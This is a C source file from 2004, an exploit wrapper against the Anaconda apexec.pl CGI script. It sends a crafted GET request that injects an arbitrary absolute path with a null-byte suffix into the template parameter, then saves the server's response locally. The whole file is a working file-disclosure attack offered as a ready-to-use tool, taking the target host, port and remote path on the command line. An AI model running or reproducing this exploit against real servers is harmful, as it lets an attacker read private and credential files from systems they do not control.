/*
 * Anaconda apexec.pl - File Disclosure Exploit Wrapper
 * 2004.10.19 - I)ruid <druid@caughq.org>
 *
 * This tool connects to the target server on the specified http
 * port, requests a file using Anaconda's apexec.pl template
 * function, then copies the contents of the response into a
 * specified local copy of the requested file.
 *
 */


#include <arpa/inet.h>
#include <errno.h>
#include <libgen.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define DEBUG 0

extern int errno;


static char get_part_1[] = "/cgi-bin/apexec.pl?template=";
static char get_part_2[] = "%%0000.html";


int main( int argc, char *argv[] ) {
	FILE *f1;
	int x, sock, bytes;
	int commandlen;
	char *remotehost;
	char *remoteport;
	char *remotefile;
	char *localfile;
	char http_command[1024];
	struct in_addr address;
	struct sockaddr_in addr;
	struct hostent *h;
	char buffer[1];

	if( argc < 5 ) {
		fprintf( stderr, "Usage: %s <host> <port> </full/path/to/remotefile> <localfile>\n", basename(argv[0]) );
		exit(-1);
	}
	remotehost = argv[1];
	remoteport = argv[2];
	remotefile = argv[3];
	localfile = argv[4];

	/* Output Header */
	printf( "apexec.pl File Disclosure Exploit\n" );
	printf( "I)ruid <druid@caughq.org>\n\n" );
	printf( "Attempting retrieval of %s from %s:%s\n", remotefile, remotehost, remoteport );

	/* Convert remotehost into binary network byte order */
	if( inet_aton( remotehost, &address ) == 0 ) {
		if( ! (h = gethostbyname( remotehost )) ) {
			perror(remotehost);
			exit(-1);
		}
		memcpy( &address.s_addr, h->h_addr_list[0], sizeof(unsigned long) );
	}

	/* Build socket */
	if ( (sock = socket( PF_INET, SOCK_STREAM, IPPROTO_TCP )) == -1 ) {
		fprintf( stderr, "socket: %s\n", strerror(errno) );
	}

	/* Connect our socket to remote host */
	addr.sin_family = PF_INET;
	addr.sin_addr.s_addr = address.s_addr;
	addr.sin_port = htons(atol(remoteport));
	if( (connect( sock, (struct sockaddr *) &addr, sizeof(addr) )) == -1 ) {
		fprintf( stderr, "connect: %s\n", strerror(errno) );
		exit(-1);
	}


	/* Send file request */
	commandlen = strlen("GET ") + strlen(get_part_1) + strlen(remotefile) + strlen(get_part_2) + 1;
	sprintf( http_command, "GET %s%s%s\n", get_part_1, remotefile, get_part_2 );
	if(DEBUG) printf( "Sending GET request: %s", http_command );
	if( (write( sock, &http_command, commandlen )) == -1 ) {
		fprintf( stderr, "write: %s\n", strerror(errno) );
		exit(-1);
	}
	if(DEBUG>2) for( x = 0; x < commandlen; x++ ) printf( "\\x%02x", http_command[x] );
	if(DEBUG>2) printf( "\n" );

	/* Read in response and write it to file */
	f1 = fopen( localfile, "w" );
	while( (bytes = read( sock, buffer, sizeof(buffer) )) > 0 ) {
		if(DEBUG>2) printf( "%c", buffer[0] );
		fwrite( buffer, sizeof(buffer), 1, f1 );
	}
	if( bytes == -1 ) {
		fprintf( stderr, "read: %s\n", strerror(errno) );
		exit(-1);
	}

	/* cleanup */
	fclose( f1 );
	close( sock );
	exit( 0 );
}